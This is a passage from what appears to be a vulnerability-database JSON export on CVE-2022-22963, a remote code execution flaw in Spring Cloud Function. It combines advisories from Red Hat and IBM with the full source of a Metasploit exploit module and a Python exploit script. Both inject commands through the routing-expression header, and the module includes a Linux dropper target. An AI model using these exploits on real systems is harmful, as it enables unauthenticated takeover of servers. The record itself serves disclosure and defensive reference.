"AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-21T23:36:15", "description": "# CVE-2022-22963 Exploit\nThis repository contains a Rust-based e...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-04-10T14:12:58", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-05-31T19:48:01", "id": "6256CA70-58E5-5DE4-AB28-000166517607", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-21T23:24:34", "description": "# CVE-2022-22963 (spring cloud function sple rce)\n### spring clo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-07T15:57:29", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-06-05T02:13:29", "id": "72294700-E478-5397-A47A-6098D06CA60A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-21T23:25:35", "description": "# Exploit for RCE in Spring Cloud (CVE 2022-22963)\nExploit for *...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-25T19:50:38", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-05-25T19:54:23", "id": "BEC31AE7-B839-564C-9541-59368931D558", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-03T13:20:46", "description": "# Spring CVE\nThis includes CVE-2022-22963, a Spring SpEL / Expre...", "cvss3": {}, "published": "2022-03-31T20:19:51", "type": "githubexploit", "title": "Exploit for CVE-2022-22963", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-03T07:36:29", "id": "6E5C078B-B2FA-520B-964A-D7055FD4EB0A", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-04-01T02:33:23", "description": "# springhound\nCreated after the release of CVE-2022-22965 a...", "cvss3": {}, "published": "2022-04-01T00:34:29", "type": "githubexploit", "title": "Exploit for CVE-2022-22963", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T00:47:30", "id": "D30073F4-9BB7-54D9-A5F6-DCCA5A005D4D", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}], "zdt": [{"lastseen": "2023-07-21T18:40:34", "description": "Spring Cloud Function versions prior to 3.1.7 and 3.2.3 are vulnerable to remote code execution due to using an unsafe evaluation context with user-provided queries. By crafting a request to the application and setting the spring.cloud.function.routing-expression header, an unauthenticated attacker can gain remote code execution. Both patched and unpatched servers will respond with a 500 server error and a JSON encoded message.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:00:00", "type": "zdt", "title": "Spring Cloud Function SpEL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T00:00:00", "id": "1337DAY-ID-37565", "href": "https://0day.today/exploit/description/37565", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Spring Cloud Function SpEL Injection',\n 'Description' => %q{\n Spring Cloud Function versions prior to 3.1.7 and 3.2.3 are vulnerable to remote code execution due to using\n an unsafe evaluation context with user-provided queries. By crafting a request to the application and setting\n the spring.cloud.function.routing-expression header, an unauthenticated attacker can gain remote code\n execution. Both patched and unpatched servers will respond with a 500 server error and a JSON encoded message.\n },\n 'Author' => [\n 'm09u3r', # vulnerability discovery\n 'hktalent', # github PoC\n 'Spencer McIntyre'\n ],\n 'References' => [\n ['CVE', '2022-22963'],\n ['URL', 'https://github.com/hktalent/spring-spel-0day-poc'],\n ['URL', 'https://tanzu.vmware.com/security/cve-2022-22963'],\n ['URL', 'https://attackerkb.com/assessments/cda33728-908a-4394-9bd5-d4126557d225']\n ],\n 'DisclosureDate' => '2022-03-29',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DefaultOptions' => {\n 'RPORT' => 8080,\n 'TARGETURI' => '/functionRouter'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'])\n )\n\n return CheckCode::Unknown unless res\n\n # both vulnerable and patched servers respond with 500 and a JSON body with these keys\n return CheckCode::Safe unless res.code == 500\n return CheckCode::Safe unless %w[timestamp path status error message].to_set.subset?(res.get_json_document&.keys&.to_set)\n\n # best we can do is detect that the service is running\n CheckCode::Detected\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI']),\n 'headers' => {\n 'spring.cloud.function.routing-expression' => \"T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','#{cmd.gsub(\"'\", \"''\")}'})\"\n }\n )\n\n fail_with(Failure::Unreachable, 'Connection failed') if res.nil?\n fail_with(Failure::UnexpectedReply, 'The server did not respond with the expected 500 error') unless res.code == 500\n end\nend\n", "sourceHref": "https://0day.today/exploit/37565", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-23T05:12:41", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-11T00:00:00", "type": "zdt", "title": "Spring Cloud 3.2.2 - Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-07-11T00:00:00", "id": "1337DAY-ID-38858", "href": "https://0day.today/exploit/description/38858", "sourceData": "# Exploit Title: Spring Cloud 3.2.2 - Remote Command Execution (RCE)\n# Exploit Author: GatoGamer1155, 0bfxgh0st\n# Vendor Homepage: https://spring.io/projects/spring-cloud-function/\n# Description: Exploit to execute commands exploiting CVE-2022-22963\n# Software Link: https://spring.io/projects/spring-cloud-function\n# CVE: CVE-2022-22963\n\nimport requests, argparse, json\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--url\", type=str, help=\"http://172.17.0.2:8080/functionRouter\", required=True)\nparser.add_argument(\"--command\", type=str, help=\"ping -c1 172.17.0.1\", required=True)\nargs = parser.parse_args()\n\nprint(\"\\n\\033[0;37m[\\033[0;33m!\\033[0;37m] It is possible that the output of the injected command is not reflected in the response, to validate if the server is vulnerable run a ping or curl to the attacking host\\n\")\n\nheaders = {\"spring.cloud.function.routing-expression\": 'T(java.lang.Runtime).getRuntime().exec(\"%s\")' % args.command }\ndata = {\"data\": \"\"}\n\nrequest = requests.post(args.url, data=data, headers=headers)\nresponse = json.dumps(json.loads(request.text), indent=2)\nprint(response)\n", "sourceHref": "https://0day.today/exploit/38858", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2023-08-16T15:27:36", "description": "Red Hat OpenShift Serverless Client kn 1.21.1 provides a CLI to interact with Red Hat OpenShift Serverless 1.21.1. The kn CLI is delivered as an RPM package for installation on RHEL platforms, and as binaries for non-Linux platforms.\n\nSecurity Fix(es):\n\n* spring-cloud-function: Remote code execution by malicious Spring Expression (CVE-2022-22963)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T07:34:16", "type": "redhat", "title": "(RHSA-2022:1291) Low: Release of OpenShift Serverless Client kn 1.21.1", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-11T08:17:49", "id": "RHSA-2022:1291", "href": "https://access.redhat.com/errata/RHSA-2022:1291", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T15:27:36", "description": "This version of the OpenShift Serverless Operator, which is supported on Red Hat OpenShift Container Platform versions 4.6, 4.7, 4.8, 4.9, and 4.10, includes a security fix. For more information, see the documentation listed in the References section.\n\nSecurity Fix(es):\n\n* spring-cloud-function: Remote code execution by malicious Spring Expression (CVE-2022-22963)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T08:22:04", "type": "redhat", "title": "(RHSA-2022:1292) Low: Release of OpenShift Serverless 1.21.1", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-11T08:22:15", "id": "RHSA-2022:1292", "href": "https://access.redhat.com/errata/RHSA-2022:1292", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T15:27:36", "description": "New features and enhancements\n\n1. Verifying image signatures against Cosign public keys: You can use RHACS to ensure the integrity of the container images in your clusters by verifying image signatures against preconfigured keys. You can also create policies to block unsigned images and images that do not have a verified signature and enforce the policy by using an admission controller to stop unauthorized deployment creation. \n\n2. Registry integrations for Amazon Elastic Container Registry (ECR) are now automatically generated for Amazon Web Services (AWS) clusters. This feature requires that the nodes' Instance Identity and Access Management (IAM) Role has been granted access to ECR. You can turn off this feature by disabling the EC2 instance metadata service in your nodes. \n\n3. Identifying missing Kubernetes network policies: RHACS 3.70 ships with a new default policy that allows you to easily identify deployments that are not restricted by any ingress network policy and to trigger violation alerts accordingly. The default policy is named Deployments should have at least one ingress Network Policy. It is disabled by default. This default policy uses a new policy criterion called \"Alert on missing ingress Network Policy.\" To identify pod isolation gaps, you can clone this default policy or create a new one by using the policy criterion and enabling it on selected resources.\n\n4. A policy to detect the Spring Cloud Function RCE vulnerability [CVE-2022-22963] and the Spring Framework Spring4Shell RCE vulnerability [CVE-2022-22965] has been added. It has a severity level of Critical and is enabled by default.\n\n5. A new policy criterion has been added to validate the value of allowPrivilegeEscalation within the Kubernetes security context. You can use this policy criterion to provide alerts when a deployment is configured to allow a container process to gain more privileges than its parent process.\n\n6. Customers using the recommended Operator method to deploy RHACS on OpenShift Container Platform can now view the credentials for the admin user in the OpenShift Container Platform console. When viewing the Central object, the Details tab provides a clickable link to the credentials under Admin Password Secret Reference. The displayed credentials are the default generated password or a previously configured and stored custom secret.\n\n7. Previously, RHACS limited the number of allowed inclusion and exclusion scopes within a scope to ten each. This restriction has been removed.\n\nNotable technical changes\n\n1. Vulnerability scanning and reporting for RHCOS nodes: Vulnerability scanning and reporting for Red Hat Enterprise Linux CoreOS (RHCOS) nodes has been disabled until scanning improvements are made for improved accuracy and to support full host-level scanning beyond just Kubernetes components. Currently, RHCOS uses National Vulnerability Database (NVD) vulnerability data for reporting vulnerabilities for Kubernetes components from RHCOS. In the enhanced version, vulnerability reporting will be based on Red Hat published security data. (ROX-10662)\n\nDeprecated Features:\n\n- Ability to add comments to alerts and processes\n- Anchore, Tenable, and Docker Trusted registry integrations\n- External authorization plug-in for scoped access control\n- FROM option in the Disallowed Dockerfile line policy field\n- RenamePolicyCategory and DeletePolicyCategory API endpoints\n- --rhacs option for the roxctl helm output command\n\nRemoved Features:\n\n- Ability to delete default policies\n- Security policies without a policyVersion\n- /v1/policies API endpoint response: field response body parameter\n\nSecurity Fixes:\n\n* json-pointer: type confusion vulnerability can lead to a bypass of CVE-2020-7709 when the pointer components are arrays (CVE-2021-23820)\n* opencontainers: OCI manifest and index parsing confusion (CVE-2021-41190)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T02:02:58", "type": "redhat", "title": "(RHSA-2022:4880) Moderate: ACS 3.70 enhancement and security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-25032", "CVE-2020-7709", "CVE-2021-23222", "CVE-2021-23820", "CVE-2021-25219", "CVE-2021-3634", "CVE-2021-3672", "CVE-2021-3737", "CVE-2021-41190", "CVE-2021-4189", "CVE-2022-1154", "CVE-2022-1271", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-06-02T02:03:22", "id": "RHSA-2022:4880", "href": "https://access.redhat.com/errata/RHSA-2022:4880", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2023-07-12T16:34:20", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-12T00:00:00", "type": "packetstorm", "title": "Spring Cloud 3.2.2 Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-07-12T00:00:00", "id": "PACKETSTORM:173430", "href": "https://packetstormsecurity.com/files/173430/Spring-Cloud-3.2.2-Remote-Command-Execution.html", "sourceData": "`# Exploit Title: Spring Cloud 3.2.2 - Remote Command Execution (RCE) \n# Date: 07/07/2023 \n# Exploit Author: GatoGamer1155, 0bfxgh0st \n# Vendor Homepage: https://spring.io/projects/spring-cloud-function/ \n# Description: Exploit to execute commands exploiting CVE-2022-22963 \n# Software Link: https://spring.io/projects/spring-cloud-function \n# CVE: CVE-2022-22963 \n \nimport requests, argparse, json \n \nparser = argparse.ArgumentParser() \nparser.add_argument(\"--url\", type=str, help=\"http://172.17.0.2:8080/functionRouter\", required=True) \nparser.add_argument(\"--command\", type=str, help=\"ping -c1 172.17.0.1\", required=True) \nargs = parser.parse_args() \n \nprint(\"\\n\\033[0;37m[\\033[0;33m!\\033[0;37m] It is possible that the output of the injected command is not reflected in the response, to validate if the server is vulnerable run a ping or curl to the attacking host\\n\") \n \nheaders = {\"spring.cloud.function.routing-expression\": 'T(java.lang.Runtime).getRuntime().exec(\"%s\")' % args.command } \ndata = {\"data\": \"\"} \n \nrequest = requests.post(args.url, data=data, headers=headers) \nresponse = json.dumps(json.loads(request.text), indent=2) \nprint(response) \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/173430/springcloud322-exec.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-31T17:01:15", "description": "", "cvss3": {}, "published": "2022-03-31T00:00:00", "type": "packetstorm", "title": "Spring Cloud Function SpEL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T00:00:00", "id": "PACKETSTORM:166562", "href": "https://packetstormsecurity.com/files/166562/Spring-Cloud-Function-SpEL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Spring Cloud Function SpEL Injection', \n'Description' => %q{ \nSpring Cloud Function versions prior to 3.1.7 and 3.2.3 are vulnerable to remote code execution due to using \nan unsafe evaluation context with user-provided queries. By crafting a request to the application and setting \nthe spring.cloud.function.routing-expression header, an unauthenticated attacker can gain remote code \nexecution. Both patched and unpatched servers will respond with a 500 server error and a JSON encoded message. \n}, \n'Author' => [ \n'm09u3r', # vulnerability discovery \n'hktalent', # github PoC \n'Spencer McIntyre' \n], \n'References' => [ \n['CVE', '2022-22963'], \n['URL', 'https://github.com/hktalent/spring-spel-0day-poc'], \n['URL', 'https://tanzu.vmware.com/security/cve-2022-22963'], \n['URL', 'https://attackerkb.com/assessments/cda33728-908a-4394-9bd5-d4126557d225'] \n], \n'DisclosureDate' => '2022-03-29', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper \n} \n] \n], \n'DefaultTarget' => 1, \n'DefaultOptions' => { \n'RPORT' => 8080, \n'TARGETURI' => '/functionRouter' \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(datastore['TARGETURI']) \n) \n \nreturn CheckCode::Unknown unless res \n \n# both vulnerable and patched servers respond with 500 and a JSON body with these keys \nreturn CheckCode::Safe unless res.code == 500 \nreturn CheckCode::Safe unless %w[timestamp path status error message].to_set.subset?(res.get_json_document&.keys&.to_set) \n \n# best we can do is detect that the service is running \nCheckCode::Detected \nend \n \ndef exploit \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nvprint_status(\"Executing command: #{cmd}\") \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(datastore['TARGETURI']), \n'headers' => { \n'spring.cloud.function.routing-expression' => \"T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','#{cmd.gsub(\"'\", \"''\")}'})\" \n} \n) \n \nfail_with(Failure::Unreachable, 'Connection failed') if res.nil? \nfail_with(Failure::UnexpectedReply, 'The server did not respond with the expected 500 error') unless res.code == 500 \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/166562/spring_cloud_function_spel_injection.rb.txt"}], "ibm": [{"lastseen": "2023-06-24T06:01:42", "description": "## Abstract\n\nIs Sterling Order Management affected by Spring vulnerability CVE-2022-22963?\n\n## Content\n\nIBM is aware of a recently surfaced vulnerability [CVE-2022-22963](<https://nvd.nist.gov/vuln/detail/CVE-2022-22963>) and has evaluated whether any Sterling Order Management applications are affected. The following is a summary of our evaluation:\n\nComponent | \n\nSpring \nversion\n\nused\n\n| Impacted by \nCVE-2022-22963 | \n\nImmediate\n\nMitigation\n\nPlan\n\n| Latest Status \n---|---|---|---|--- \nSterling Order Management SaaS, On-prem and Certified Containers (including Store Engagement & Call Center) | Not used | No | N/A | Not vulnerable \n \nInventory Visibility\n\nMicroservice\n\n| Not used | No | N/A | Not vulnerable \n \nIntelligent Promising\n\nMicroservice\n\n| Not used | No | N/A | Not vulnerable \nOMS Data Exchange Service | Not used | No | N/A | Not vulnerable \n \nStore Inventory Management\n\nMicroservice\n\n| Not used | No | N/A | Not vulnerable \nOrder Hub | Not used | No | N/A | Not vulnerable \nSterling Fulfillment Optimizer | Not used | No | N/A | Not vulnerable \nConfigure, Price, Quote (CPQ): Omni-Configurator and Visual Modeler | Not used | No | N/A | Not vulnerable \nConfigure, Price, Quote (CPQ): Field Sales | Not used | No | N/A | Not vulnerable \n \n## Related Information \n\n[CVE-2022-22963 - National Vulnerability Database](<https://nvd.nist.gov/vuln/detail/CVE-2022-22963>)\n\n[CVE-2022-22963 - mitre.org](<https://vulners.com/cve/CVE-2022-22963>)\n\n[CVE-2022-22963: Spring Framework RCE via Data Binding on JDK 9+ - vmware.com](<https://tanzu.vmware.com/security/cve-2022-22963>)\n\n[{\"Type\":\"MASTER\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o 